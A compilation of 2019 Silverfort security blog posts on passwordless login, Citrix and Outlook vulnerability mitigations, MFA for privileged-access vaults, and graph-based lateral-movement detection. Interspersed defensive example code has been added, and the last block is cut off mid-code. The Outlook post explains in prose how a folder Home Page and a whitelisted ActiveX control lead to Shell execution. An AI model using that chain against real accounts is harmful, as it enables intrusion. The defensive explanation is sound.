2. **Reduce user-visible password surface area.** The first step here is enabling WHFB. Then, you probably want to use a solution like Silverfort to automatically map all the resources that still use passwords.
3. **Transition into a password-less deployment.** That’s where it gets tricky. The applications that don’t support password-less authentication are going to make it difficult to achieve this step. As mentioned before, I recommend an intermediate step before that, which is enforcing MFA for these applications and at the same time reducing passwords’ length and complexity.
4. **Eliminate passwords from the identity directory.** If your entire environment is covered by SSO, and login to all endpoints is based on Windows Hello for Business, you don’t need a password in your directory at all. However, I think most organizations have a long way to go before that would be possible.
An Extended Password-less Strategy The strategy I recommend has a couple of more steps than Microsoft’s, but I think it’s a bit more practical, and it allows you to gain value very early in the process: Image: Recommended process for implementing a ‘passwordless’ strategy Most organizations will implement the top part of the process to improve the security of the organization. It will simplify the login process for most users accessing most applications allowing them to use a simple, easy to remember password. However organizations that want to eliminate passwords completely, will need to go through the additional steps. Final words: Whether you chose to implement a full passwordless strategy or not, I think the combination of Windows Hello for Business and a wide multi-factor authentication solution can significantly improve the user experience and the overall security posture of the organization. Enabling WHFB and Multi-Factor Unlock isn’t difficult. Implementing an MFA solution to secure access to your most sensitive assets – can be more challenging, depending on the solution you use. If you want to know how Silverfort can help you simplify the deployment as well as enable secure authentication for any sensitive system – without requiring software agents or in-line proxies – let us know. We’d be happy to help. Yaron Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that Yaron served at the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, raised to the rank of Captain, and received a prestigious excellence award. Yaron holds a B. Sc. in Mathematics, Summa Cum Laude, an M. Sc. and Ph. D. 
in Computer Science from the Technion – Israel Institute of Technology.

Wishing you all Happy Holidays and a Wonderful and Safe 2020!

Yaron Kassner

---
- Published: 2019-12-25
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/recommended-mitigation-steps-for-vulnerability-in-citrix-adc-and-citrix-gateway-cve-2019019781/

*****By Yaron Kassner, CTO and Co Founder, Silverfort*****

A recently identified vulnerability in Citrix Application Delivery Controller (ADC), formerly known as NetScaler ADC, and Citrix Gateway, formerly known as NetScaler Gateway, allows an unauthenticated attacker to perform arbitrary code execution if exploited. The vulnerability has been assigned the CVE number CVE-2019-19781. It is estimated that about 80K organizations are impacted. There is no patch available yet, but Citrix published recommended mitigations. For Silverfort customers, we recommend the following additional precautionary measures on top of the ones recommended by Citrix, to ensure that an already compromised device is not used for unauthorized access.
Here are the recommended mitigation steps for Citrix ADC or Citrix Gateway users:

- Subscribe to the Citrix alerts so you will know when the fixed firmware is released: https://support.citrix.com/user/alerts
- Perform the mitigation steps recommended by Citrix as described here: https://support.citrix.com/article/CTX267679
- Protect access to systems and applications accessible from your Citrix device with MFA: In addition to the steps recommended by Citrix, we recommend enforcing MFA to secure the authentication of users before granting them access to sensitive resources. Citrix enables you to enforce MFA on access through its devices to target systems. However, that solution isn’t enough: if a hacker has already exploited the vulnerability and compromised the Citrix device, MFA will not be enforced on access by code running on the compromised Citrix device. In this case Silverfort can still enforce secure authentication, whether the access originates from the compromised device or from a legitimate user.
- Monitor authentication activity and look for anomalies: Anomalies in authentication traffic originating from the Citrix device, and in authentication traffic targeting the systems that are accessible from the Citrix device, should be visible in logs and should trigger further investigation. Silverfort’s AI-driven risk engine can automatically identify these anomalies and enforce a policy to alert in real time or block access. Things to look out for include:
  - High-risk authentication
  - An unusually high load of authentication
  - Failed authentications
  - Authentication originating from the Citrix Gateway that does not normally originate from there. For example, watch for file share access (cifs Kerberos tickets) and RDP access (termsrv Kerberos tickets).
  - Authentication originating from the Citrix Gateway that is not directed to Citrix-protected applications.

It's important to remember that threats exist within our networks, not just outside them.
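The detection points listed above, turned into runnable checks as an added example. This code is not from the post and is not Silverfort’s risk engine: the gateway address, the allowlist of Citrix-published services, the thresholds and the sample records are all constructed for the example, and the records are loosely modelled on the fields of Windows event 4769 (Kerberos service ticket requested). It covers the load, failure, cifs/termsrv and unexpected-target items; the “high-risk authentication” item needs a risk score that the example does not model:

```python
"""Detect the Citrix Gateway authentication anomalies listed in the post (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed environment values (placeholders for this example, not from the post):
GATEWAY_ADDRESSES = {"10.0.5.20"}                             # Citrix ADC / Gateway source address
CITRIX_PUBLISHED_SERVICES = {"http/storefront.corp.example"}  # services the gateway normally reaches
LATERAL_SERVICE_CLASSES = {"cifs", "termsrv"}                 # file shares and RDP, as named in the post
FAILURE_THRESHOLD = 3                                         # failed requests per source in the window
VOLUME_THRESHOLD = 6                                          # requests per source in the window
WINDOW = timedelta(minutes=5)

# Constructed records, loosely modelled on the fields of Windows event 4769.
# failure_code "0x0" is success; 0x12 (client revoked) is used here as a sample failure.
SAMPLE_EVENTS = [
    {"time": "2019-12-25T09:00:00", "account": "alice", "service": "http/storefront.corp.example",
     "client": "10.0.5.20", "failure_code": "0x0"},
    {"time": "2019-12-25T09:00:05", "account": "alice", "service": "cifs/fs01.corp.example",
     "client": "10.0.5.20", "failure_code": "0x0"},
    {"time": "2019-12-25T09:00:07", "account": "alice", "service": "TERMSRV/dc01.corp.example",
     "client": "10.0.5.20", "failure_code": "0x0"},
    {"time": "2019-12-25T09:00:09", "account": "alice", "service": "ldap/dc01.corp.example",
     "client": "10.0.5.20", "failure_code": "0x0"},
    {"time": "2019-12-25T09:01:00", "account": "bob", "service": "cifs/fs01.corp.example",
     "client": "10.0.7.15", "failure_code": "0x0"},   # a workstation: normal file share use
    {"time": "2019-12-25T09:02:00", "account": "carol", "service": "cifs/fs02.corp.example",
     "client": "10.0.5.20", "failure_code": "0x12"},
    {"time": "2019-12-25T09:02:01", "account": "carol", "service": "cifs/fs02.corp.example",
     "client": "10.0.5.20", "failure_code": "0x12"},
    {"time": "2019-12-25T09:02:02", "account": "carol", "service": "cifs/fs02.corp.example",
     "client": "10.0.5.20", "failure_code": "0x12"},
]


def max_requests_in_window(times, window=WINDOW):
    """Largest number of requests that fall inside any interval of length `window`."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:      # slide the window start forward
            start += 1
        best = max(best, end - start + 1)
    return best


def detect(events, gateways=GATEWAY_ADDRESSES, allowed=CITRIX_PUBLISHED_SERVICES):
    """Return (rule, detail) findings for the anomaly types the post lists."""
    findings = []
    per_source = defaultdict(list)
    allowed = {s.lower() for s in allowed}
    for e in sorted(events, key=lambda ev: ev["time"]):
        e = dict(e, time=datetime.fromisoformat(e["time"]))
        per_source[e["client"]].append(e)
        # Per-request rules apply only to successful tickets requested from the gateway.
        if e["client"] not in gateways or e["failure_code"] != "0x0":
            continue
        service = e["service"].lower()
        if service.split("/", 1)[0] in LATERAL_SERVICE_CLASSES:
            findings.append(("gateway_lateral_service", f'{e["account"]} -> {e["service"]}'))
        elif service not in allowed:
            findings.append(("gateway_unexpected_target", f'{e["account"]} -> {e["service"]}'))
    # Per-source rules: failure bursts and unusual request volume.
    for source, evs in per_source.items():
        failures = sum(1 for e in evs if e["failure_code"] != "0x0")
        if failures >= FAILURE_THRESHOLD:
            findings.append(("failed_auth_burst", f"{source}: {failures} failed requests"))
        peak = max_requests_in_window([e["time"] for e in evs])
        if peak >= VOLUME_THRESHOLD:
            minutes = int(WINDOW.total_seconds() // 60)
            findings.append(("auth_volume_spike", f"{source}: {peak} requests in {minutes} min"))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:26s} {detail}")
```

The volume and failure thresholds are deliberately tiny so the constructed sample trips them; in production they should come from a per-source baseline, and the service allowlist should be generated from the gateway’s published application list rather than typed by hand.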
We must consider the fact that adversaries may have already penetrated our networks and gained a foothold that enables further lateral movement and access to sensitive resources. In order to ensure authorized access to our systems we must validate the identity and enforce secure authentication on access from those already inside our networks, just as we require secure authentication to validate the identities of those coming from outside our networks through a VPN or other gateways.

Yaron Kassner, CTO and Co Founder, Silverfort

---
- Published: 2019-11-18
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/pam-is-king-but-who-is-protecting-the-king/

By Jonathan Nativ, Sales Director, APAC, Silverfort

In the game of chess, the king is the most important piece. Once your opponent gets your king, the game is over. Yet the king is a relatively vulnerable piece, and it’s protected by stronger ones like rooks, bishops and, of course, the queen. In the IT world, Privileged Access Management (PAM) (often referred to as a Password Vault) is the ‘King’ because it stores the keys to the kingdom: the credentials of the most important and sensitive users in the organization (privileged users), and it is often used as the entry point into the organization for external users. Therefore, adversaries will do all they can in order to compromise it.

### What is a PAM Solution and Why is it Important to Protect?

The PAM solution is a centralized repository where all the sensitive credentials are stored and managed. This includes:

1. Domain Administrator credentials
2. Database credentials
3. Cloud infrastructure credentials and access keys
4. Firewall passwords
5. Corporate Social Media Accounts
6. Many more

One key thing to note about PAM solutions is that once implemented, the PAM becomes the single most sensitive system in the network, as it contains all the credentials of the most privileged users. According to Gartner, securing privileged accounts in an organization is a top priority security project these days. This is due to the fact that compromised credentials were used in more than 80% of data breaches. When attackers gain access to the network, the first thing they are going to look for are privileged credentials. These credentials will allow them to access high-value assets, move laterally in the network and install malicious software.

What if one of your system administrators (who uses the PAM solution) falls victim to a phishing attack and their personal credentials are stolen? If those credentials allow access to the PAM solution, the attacker now has access to all the credentials that have been conveniently stored in one central location. If an adversary gains access to the PAM solution, he or she gains unlimited access to any sensitive system in the network. Adding Multi-Factor Authentication (MFA) provides a critical layer of security against the use of stolen user credentials. For that reason, PAM vendors strongly recommend always implementing an MFA solution together with the PAM solution.

### So How Should I Protect my King?

In a recent paper published by Deloitte, PAM and MFA are ranked as the two top identity initiatives for enterprises, with equal importance. These two important initiatives go hand in hand: putting all your sensitive passwords in one place doesn’t make much sense if attackers could easily access it with yet another password. Once the PAM solution is protected with MFA, even if an attacker obtains the stolen credentials of a system administrator, the attacker will not be able to access the PAM solution.
This is because an additional factor of authentication (like a token or approval through a mobile application) is required from the user before access will be granted. When selecting and implementing an MFA solution, it is key to make sure that all the interfaces to the PAM solution are protected by MFA, not just the front door. This may be easier said than done. Let me explain: most PAM solutions have several interfaces, including:

1. Web Portal Access: used for credential retrieval as well as administrative tasks
2. Proxy Access: used by system administrators to connect to systems using vaulted credentials (this is the method system administrators prefer, as it is more transparent)
3. API Access: used for automated tasks and service accounts

Image: a basic high-level architecture of a typical PAM solution

### Here Comes the Queen

To offer real protection, an MFA solution must provide a way to secure each interface into the PAM system. Without protecting all the interfaces, you are leaving a vulnerability in the system that will allow an attacker to get in. In many cases MFA is not implemented on all the PAM interfaces due to the complex integration requirements. In most cases MFA implementations require agents or proxies as well as changes to the network architecture. As PAM solutions are often delivered as a “black box” appliance, it’s not possible to install agents or make changes to the code. MFA solutions that are based on RADIUS are complex to implement and provide a poor user experience, because a One Time Password (OTP) needs to be typed for each session that is opened (keep in mind that administrators might open countless sessions every day, so it becomes a nuisance). Silverfort’s agentless and proxy-less solution enables MFA on all PAM interfaces without the need to make complex changes to the system or the environment.
Thanks to Silverfort’s agentless architecture it is also possible to protect all the interfaces to the PAM solution, including the web interface, GUI client, API and proxies, without the need to perform MFA again and again for each session. When choosing an MFA vendor, it is also important to take the end-user experience into consideration. IT administrators (who use privileged accounts) are usually very sensitive to changes in their workflow. They also use the PAM solution multiple times in the span of an hour, so any inconvenience can have a major impact on productivity. In most cases the users store the credentials for the PAM solution in their browsers or connection managers to make their life easier.

Other aspects that should be considered when choosing an MFA provider for a PAM solution:

1. Changes to current workflows
2. Ability to open multiple sessions at the same time without multiple MFA challenges
3. Easy-to-use MFA options such as soft tokens and mobile MFA apps
4. Ability to trigger MFA only once within a given time frame
5. Risk-based MFA that considers user behavior and context

Silverfort’s risk-based authentication solution is flexible, which enables it to balance security and user experience by requiring users to authenticate with MFA only once in a while, while keeping them secured all the time. This, together with the adaptive risk-based approach, makes it an ideal MFA solution for a PAM implementation.

### Final Words

PAM is a critical security layer for organizations. PAM projects require a significant amount of time and resources. Does it make sense to go through all the trouble to lock the door but leave the window open? MFA should be added to protect your PAM solution from day one. It should be considered an integral part of the PAM solution and be used to secure access through all routes and interfaces in order to protect the most important assets in your network.
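The three PAM interfaces and the “once within a time frame” and risk-based items from the checklist above, as an added example (not Silverfort’s or any PAM vendor’s code): a small policy that returns allow, challenge or block for every route into the vault, so that a recent MFA covers the next proxy or API session without another prompt while a risky context still steps up. The interface names, the eight-hour validity window, the risk thresholds and the administrator’s day of requests are assumptions constructed for the example; the risk score is an input that a risk engine would supply and is not modelled here:

```python
"""Risk-aware MFA decisions across PAM interfaces (added example, not product logic)."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta

PAM_INTERFACES = {"web", "proxy", "api"}   # the three interfaces named in the post
MFA_VALIDITY = timedelta(hours=8)          # assumed: one successful MFA covers this long
STEP_UP_RISK = 0.6                         # assumed risk-engine thresholds (0.0 .. 1.0)
BLOCK_RISK = 0.9


@dataclass
class AccessRequest:
    user: str
    interface: str      # "web", "proxy" or "api"
    time: datetime
    risk: float         # score supplied by a risk engine (assumed input)


@dataclass
class PamMfaPolicy:
    """Decides allow / challenge / block for every route into the vault, not only the web front door."""
    last_mfa: dict = field(default_factory=dict)   # user -> time of last successful MFA

    def decide(self, req: AccessRequest) -> str:
        if req.interface not in PAM_INTERFACES:
            return "block"                 # an unmapped route is the open window: deny by default
        if req.risk >= BLOCK_RISK:
            return "block"
        if req.risk >= STEP_UP_RISK:
            return "challenge"             # risky context: step up even inside the validity window
        last = self.last_mfa.get(req.user)
        if last is not None and timedelta(0) <= req.time - last <= MFA_VALIDITY:
            return "allow"                 # recent MFA covers any interface: no prompt per session
        return "challenge"

    def record_success(self, user: str, when: datetime) -> None:
        self.last_mfa[user] = when


def simulate(requests, approve=lambda req: True):
    """Run requests through one policy; `approve` says whether a challenge was completed."""
    policy = PamMfaPolicy()
    decisions = []
    for req in requests:
        decision = policy.decide(req)
        if decision == "challenge" and approve(req):
            policy.record_success(req.user, req.time)
        decisions.append(decision)
    return decisions


# Constructed administrator day: several vault sessions, one risky request, one unknown route.
T0 = datetime(2019, 11, 18, 9, 0)
SAMPLE_DAY = [
    AccessRequest("admin1", "web", T0, 0.1),                             # first login: challenge
    AccessRequest("admin1", "proxy", T0 + timedelta(minutes=10), 0.1),   # new session: allow
    AccessRequest("admin1", "api", T0 + timedelta(hours=2), 0.1),        # other interface: allow
    AccessRequest("admin1", "proxy", T0 + timedelta(hours=3), 0.7),      # anomalous context: challenge
    AccessRequest("admin1", "web", T0 + timedelta(hours=12), 0.1),       # window expired: challenge
    AccessRequest("admin1", "ssh-jump", T0 + timedelta(hours=12), 0.1),  # unmapped route: block
    AccessRequest("admin2", "web", T0, 0.95),                            # very high risk: block
]

if __name__ == "__main__":
    for req, decision in zip(SAMPLE_DAY, simulate(SAMPLE_DAY)):
        print(f"{req.user:7s} {req.interface:9s} risk={req.risk:.2f} -> {decision}")
```

The point the post makes is visible in the deny-by-default branch: a route that was never enumerated is neither allowed nor silently passed through, which is what an unprotected interface amounts to.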
---
- Published: 2019-08-14
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/detecting-and-predicting-malicious-access-in-enterprise-networks-using-the-louvain-community-detection-algorithm/

By Gal Sadeh, Sr. Data Scientist, Silverfort

Many data breaches start with gaining access to an insignificant computer and propagating by jumping from one computer to another until reaching the valuable ‘crown jewels’, like admin credentials, information about an important DB holding customer data and more. Detecting and preventing these attacks is a very complicated task for security professionals, since the number of possible attack paths is extremely high and networks change frequently (new entities are added or removed, permissions are changed, etc.). Most of the techniques for detecting attacks are based on recognition of known malicious patterns, but for complex attacks this is no longer enough. When the attack doesn’t have a known recognizable pattern, it’s extremely hard to detect.

### Our initial attempts with attack detection

Since Silverfort analyzes authentication and access data monitored over the entire enterprise network and cloud environments, it needs to analyze a lot of data. However, it took a few attempts to decide what would be the best way to analyze all this data to detect unknown threats. I gave this question a lot of thought. At first, I thought I would map all the possible access paths based on the data and try to detect the vulnerable ones. However, this approach becomes almost impossible to implement when the network contains many entities, since the number of possible access paths grows exponentially with the number of entities. I tried to improve this method by eliminating some of the access paths. For example, if a user doesn’t have permissions in the directory to access a certain server, we can eliminate that path.
This approach helped us process a large number of access paths, but it wasn’t enough, because even without permissions an access path might be possible through exploitation of vulnerabilities. So, we decided to try a different approach: we divided the network into communities, based on the fact that members of a community communicate with each other, and with shared resources, more than with other entities in the network. Let me explain further.

### What are communities and what are community detection algorithms?

Networks can be modelled as graphs of connections (edges) between nodes, where each node represents an entity (user, computer, etc.) and each edge connecting two nodes represents a logical connection. For example, if a user accesses a server, the user and server would be the ‘nodes’ and the connection between them would be represented by an ‘edge’. Each edge is also associated with a weight that represents the strength of the connection, which is based on the number of authentication and access requests we see on this edge. A community detection algorithm takes a raw graph as input, analyzes it and assigns each node to a community. Each community is characterized by its ‘density’, which is the ratio between the total weight of its edges and the number of nodes in the community. Most community detection algorithms have an ‘objective’, which is a number that represents the overall compatibility of the nodes with the communities they were assigned to. The goal is to maximize that number. A larger objective means ‘high density’ communities. Note that different algorithms may have slightly different ‘objectives’.

### Assigning nodes to communities using the Louvain algorithm

We selected the Louvain algorithm because it is a well-known algorithm that runs very fast even in large, complex networks: its run time is almost linear in the network’s size.
The algorithm tries to maximize its objective by repeating these two phases:

1. It assigns each node in the graph to a single community. For each edge connecting node u and node v, the algorithm checks whether merging the communities of u and v increases the objective, and if so, it performs the merge.
2. The algorithm builds a new graph, where each community is represented by a single node, and the weight assigned to the edge between two communities is the sum of the weights of all the edges between the merged nodes of each community.

The algorithm stops when there is no step that increases the objective. The output is an induced graph, where nodes represent communities. For our implementation we used a Python package called “community”. Further reading material can be found here: http://www.emilio.ferrara.name/wp-content/uploads/2011/07/isda2011-k-path.pdf

### Community detection and cyber security

Since each community is dense, meaning there are many access paths between its nodes, if an attacker gains access to one of the entities (user account or device) in a community, it would be easier for him or her to gain access to other entities in that community. Obviously, it’s harder for an attacker to expand to other communities, since there are fewer access paths between different communities. If used correctly, community detection can help identify suspicious activity within a network, predict lateral movement paths and enforce smarter policies in real time.

### How Silverfort fits in

When Silverfort’s Risk-Based Authentication Platform is deployed in a network, it monitors all the authentication and access activity between the various entities and constructs a graph as previously described. The raw graph looks like this:

Image: raw access graph. Each circle is a user and each triangle is a server.
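The two Louvain phases described above, run on a constructed access graph and followed by the search for cross-community connections that this section goes on to discuss, as an added worked example. This code is not Silverfort’s implementation and does not use the “community” package; it is a self-contained Louvain written for this page. The users, servers and request counts are constructed, and the example goes slightly beyond the text in one respect: its first phase is the standard Louvain local-moving step, which moves single nodes into the neighbouring community with the best modularity gain rather than merging communities edge by edge, and modularity is used as the objective:

```python
"""Louvain community detection over a constructed user-to-server access graph."""
from collections import defaultdict

# Constructed sample data: (user, server, number of authentication requests seen).
# Two dense groups (srvA/srvA2 and srvB/srvB2) with a single cross-group access by u3.
SAMPLE_ACCESS = [
    ("u1", "srvA", 5), ("u2", "srvA", 5), ("u3", "srvA", 5),
    ("u1", "srvA2", 3), ("u2", "srvA2", 3),
    ("u4", "srvB", 5), ("u5", "srvB", 5), ("u6", "srvB", 5),
    ("u4", "srvB2", 3), ("u5", "srvB2", 3),
    ("u3", "srvB", 1),
]


def build_graph(access):
    """Undirected weighted adjacency: adj[u][v] == number of requests on edge (u, v)."""
    adj = defaultdict(lambda: defaultdict(float))
    for src, dst, count in access:
        adj[src][dst] += count
        adj[dst][src] += count
    return {node: dict(nbrs) for node, nbrs in adj.items()}


def modularity(adj, comm):
    """Newman modularity Q of the partition `comm` (node -> community id)."""
    deg = {u: sum(n.values()) for u, n in adj.items()}
    two_m = sum(deg.values())
    q = 0.0
    for u in adj:
        for v in adj:
            if comm[u] == comm[v]:
                q += adj[u].get(v, 0.0) - deg[u] * deg[v] / two_m
    return q / two_m


def local_moving(adj):
    """Phase 1: move single nodes to the neighbouring community with the best modularity gain."""
    deg = {u: sum(n.values()) for u, n in adj.items()}
    two_m = sum(deg.values())
    comm = {u: u for u in adj}              # every node starts in its own community
    tot = dict(deg)                         # sum of degrees per community
    moved = True
    while moved:
        moved = False
        for u in sorted(adj):               # sorted order keeps the result deterministic
            old = comm[u]
            k_in = defaultdict(float)       # weight from u into each neighbouring community
            for v, w in adj[u].items():
                if v != u:                  # self-loops of aggregated communities do not count
                    k_in[comm[v]] += w
            tot[old] -= deg[u]              # evaluate gains with u taken out of its community
            # gain(c) is proportional to the modularity change of inserting u into community c
            gain = lambda c: k_in[c] - tot[c] * deg[u] / two_m
            best, best_gain = old, gain(old)
            for c in sorted(k_in):
                if gain(c) > best_gain + 1e-12:
                    best, best_gain = c, gain(c)
            tot[best] += deg[u]
            if best != old:
                comm[u] = best
                moved = True
    return comm


def aggregate(adj, comm):
    """Phase 2: collapse each community into one node; parallel edge weights are summed."""
    new = defaultdict(lambda: defaultdict(float))
    for u, nbrs in adj.items():
        for v, w in nbrs.items():
            new[comm[u]][comm[v]] += w      # intra-community weight becomes a self-loop
    return {c: dict(n) for c, n in new.items()}


def louvain(adj):
    """Repeat both phases until no merge improves the objective; return node -> community index."""
    membership = {u: u for u in adj}        # original node -> node of the current level
    graph = adj
    while True:
        comm = local_moving(graph)
        if len(set(comm.values())) == len(graph):
            break                           # nothing merged at this level: done
        membership = {u: comm[c] for u, c in membership.items()}
        graph = aggregate(graph, comm)
    labels = {}
    for u in sorted(membership):
        labels.setdefault(membership[u], len(labels))
    return {u: labels[membership[u]] for u in membership}


def cross_community_edges(adj, comm):
    """Edges whose endpoints lie in different communities: the only paths between them."""
    return sorted({tuple(sorted((u, v))) for u in adj for v in adj[u] if comm[u] != comm[v]})


if __name__ == "__main__":
    g = build_graph(SAMPLE_ACCESS)
    partition = louvain(g)
    print("communities:", partition)
    print("modularity: %.3f" % modularity(g, partition))
    print("cross-community edges to secure:", cross_community_edges(g, partition))
```

On the sample graph the result is two communities, and the single edge between them (u3 to srvB) is exactly the kind of connection the post says should be secured with step-up authentication, because an attacker in one community has to cross it to reach the other.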
The weights on the edges are determined by the number of authentication and access requests monitored, and by the permissions associated with the different nodes (for simplicity, weights are not shown on the graph). Then we use the Louvain algorithm to identify communities in the network.

[Figure: the same graph after community detection, with nodes grouped by community.]

Now we can spot nodes that communicate with entities in communities they are not a part of. Those nodes are valuable targets for attackers, because they are the few points of access between communities: an attacker has to go through them in order to spread from one community to another. Securing the edges (connections) of these nodes is therefore important for preventing an attack from spreading through the network. Using Silverfort's authentication policies, companies can respond automatically to detected threats by enforcing step-up authentication to validate the user's identity, or by blocking the access altogether. This holds both for user-to-machine and for machine-to-machine communication. Identifying the communities, and the valuable cross-community connections that attackers would target, helps Silverfort customers set smart, secure authentication policies. The community graph can also help admins identify misconfigurations in their networks.

[Figure: some of the valuable nodes and connections that should be secured are marked in purple.]

### How is it leveraged today?

Some of our customers are already using Silverfort's community analysis (which is part of our AI-based risk engine) to identify communities and cross-community connections in their networks, to find misconfigurations and weak spots that should be secured, and to detect abnormal activity. Now we are helping customers take the next step: applying real-time secure authentication policies in response to detected threats, and effectively preventing lateral movement in their networks and cloud environments.

Gal Sadeh, Sr.
Data Scientist, Silverfort

Gal is a Senior Data Scientist in Silverfort's research team. He is responsible for big data analytics and for developing AI engines. He joined Silverfort after many years of research and leadership roles in the 8200 elite cyber unit of the Israel Defense Forces. Gal holds a B.Sc. in Mathematics and Computer Science from Tel Aviv University.

---
- Published: 2019-08-14
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/detecting-and-predicting-malicious-access-in-enterprise-networks-using-the-louvain-community-detection-algorithm-2/

---
- Published: 2019-07-11
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/blocking-office365-attacks-cve-2017-11774-with-mfa/

US Cyber Command recently published a security alert on Twitter regarding abuse of an Outlook vulnerability: https://twitter.com/CNMF_VirusAlert/status/1146130046127681536. The vulnerability was originally found and reported by SensePost back in 2017 (see https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/). A patch has been available since then, but the vulnerability is still being actively abused.

### How does it work?

It is an interesting attack vector, allowing remote code execution (RCE) given compromised Office 365 credentials. The exploit takes advantage of a feature of Outlook's folder Home Page, which can open a web page each time a folder is opened in Outlook. Why would you want to do this? One example floating online is to have a quick link to SharePoint from inside the Outlook application. This is a legacy feature, which Microsoft's security fix removed.
This is an example of why legacy features are dangerous to keep in your software, a topic for a different blog.

The home page URL is stored in the folder's settings. Where are the folder settings defined? If the folder is synced from an on-premises Exchange server, then on that server; if it is synced from Office 365, then there. This attack vector exploits the sync from the Office 365 server to the user's actual computer.

### How does this translate into a remote code execution attack?

So far we have described how to get a web page opened, given access to the user's Office 365 account. But how does this become remote code execution? Since the web page is loaded in an Internet Explorer frame, the first thing to look at is loading ActiveX controls. Although there are restrictions on which ActiveX controls can be loaded, the attackers found a way around them: there is an Outlook ActiveX control that is whitelisted to run in the sandbox. It exposes an object that represents the container running the current code, i.e., the Outlook application itself. This object has a function called "createObject", which allows creation of any arbitrary object, including the "Shell" object, and that final object allows execution of any application, and thus escape from the sandbox. This serves as a reminder that sandboxes are not bullet-proof.

### Recommendations

There are two key recommendations:

- First of all, be sure to patch all your users' systems. A patch for this vulnerability was released back in October 2017. There is no reason to leave any system unpatched.
- In addition, we highly recommend enforcing MFA to block this and similar attacks. Enforcing MFA for users' access to the Outlook app and to Office 365 accounts stops this attack chain at its root: attackers who hold only the password cannot complete the second factor, and as a result they cannot access the Office 365 account.
Even given the vulnerabilities in the Outlook application, access to the Office 365 account is necessary to exploit the vulnerability and reach a remote code execution scenario.

Yaron Kassner, CTO and Co-Founder, Silverfort

Silverfort's CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that, Yaron served in the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, rose to the rank of Captain, and received a prestigious excellence award. Yaron holds a B.Sc. in Mathematics, Summa Cum Laude, and an M.Sc. and Ph.D. in Computer Science from the Technion – Israel Institute of Technology.

---
- Published: 2019-07-11
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/blocking-office365-attacks-cve-2017-11774-with-mfa-2/

---
- Published: 2019-06-26
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/zero-touch-secure-authentication-for-lift-and-shift-cloud-migrations/

With data breaches appearing in the headlines almost daily, many have concerns about cloud security. There is no doubt that trends like cloud, IoT and BYOD are changing our networks and dissolving the perimeters we used to have. In this reality, ensuring the security of enterprise systems that are migrated to the cloud can be a challenge, and in some cases it puts the migration of homegrown and legacy systems on hold.

When planning to migrate a homegrown or legacy application to the cloud, many organizations choose the 'lift and shift' approach. Its advantages are clear: the application and its associated data are migrated to the cloud with minimal or no changes. You "lift" the application from its existing environment and "shift" it as-is to the cloud. This means there are no significant changes to the application architecture, data flow, or authentication mechanisms.
### Securing Access to Migrated Applications

Many have concerns regarding the security of migrated applications in the cloud, and some of these concerns are justified. In a 2018 Cloud Security Report from Crowd Research Partners, 84% of respondents said their traditional security solutions either don't work at all in cloud environments or have only limited functionality. 43% of cybersecurity professionals said they struggle with visibility into cloud infrastructure security, 38% struggled with compliance, and 35% struggled to apply consistent security policies across cloud and on-premises environments. 55% said that their biggest perceived threats to cloud security were unauthorized access through misuse of employee credentials and improper access controls.

These concerns are justified when our homegrown and legacy applications rely on password-only authentication. While running in on-premises data centers, traditional defense layers provided additional protection. If the same security controls aren't available when these systems run in the cloud, they become inherently more exposed. In some cases, traditional security controls can be adapted to the system with some code changes; in other cases, such changes are impractical.

### 5 things that can help with a smooth and secure migration of on-premises servers and applications to the cloud

Here are five things to keep in mind when planning a migration of on-premises homegrown and legacy systems to the cloud:

#### Mapping dependencies before moving the app to the cloud

Successful application migration requires a detailed understanding of how all of your applications and servers communicate. To map dependencies, you first need to discover how all machines and applications in your infrastructure communicate with each other, including any Shadow IT, e.g. servers and systems implemented by various business units that your IT is not aware of.
If your applications have any dependencies on Shadow IT, these must be incorporated into your migration plan. Without mapping all dependencies first, your applications are likely to break.

#### Securing authentication to migrated applications

Securing access to enterprise systems is a top priority whether an application runs on-premises or in the cloud. After all, it doesn't really matter where the application runs: if it relies on password authentication, it can be exposed to unauthorized access. And if an attacker obtains an administrator password, which grants full access and control over the application and its infrastructure, they can steal data or make whatever changes they want. The only difference is that when an application runs in the cloud, it may not be protected by the traditional security defense layers that would defend it on-premises. However, there are cloud security defenses that can be applied. Adding multi-factor authentication to any migrated application, especially one that relies on password-only authentication, provides a critical security control and ensures that only authorized users can log into the application. (There is a caveat: if you are doing a 'lift-and-shift' migration of a homegrown or legacy system, it will probably be a challenge to apply mainstream MFA solutions. A next-generation authentication solution will better support these apps.)

#### Adding access policies (deny or grant access)

Most applications apply role-based access controls to users after they have logged into the application. In some cases, however, these are not enough. For example, you may want a policy that says a user may not log into the application from an unauthorized device, or from an untrusted location. In that case, access controls should be applied at the access-request level.
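The following is an added example, not part of the original post and not Silverfort's product code: a small Python policy engine that makes the decision at the access request, before the application's own login runs, and writes every decision to a consolidated audit trail that can then be queried for granted-but-unused rights, the least-privilege check the auditing item below describes. The policy, device list, networks, directory grants and requests are all constructed for the example.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

ALLOW, STEP_UP, DENY = "allow", "step_up", "deny"


@dataclass(frozen=True)
class AccessRequest:
    user: str
    resource: str
    source_ip: str
    device_id: str
    mfa_verified: bool = False      # second factor already completed for this request


@dataclass(frozen=True)
class AccessPolicy:
    trusted_networks: tuple         # CIDR strings considered trusted locations
    managed_devices: frozenset      # device IDs enrolled in management
    sensitive_resources: frozenset  # resources that always require a second factor


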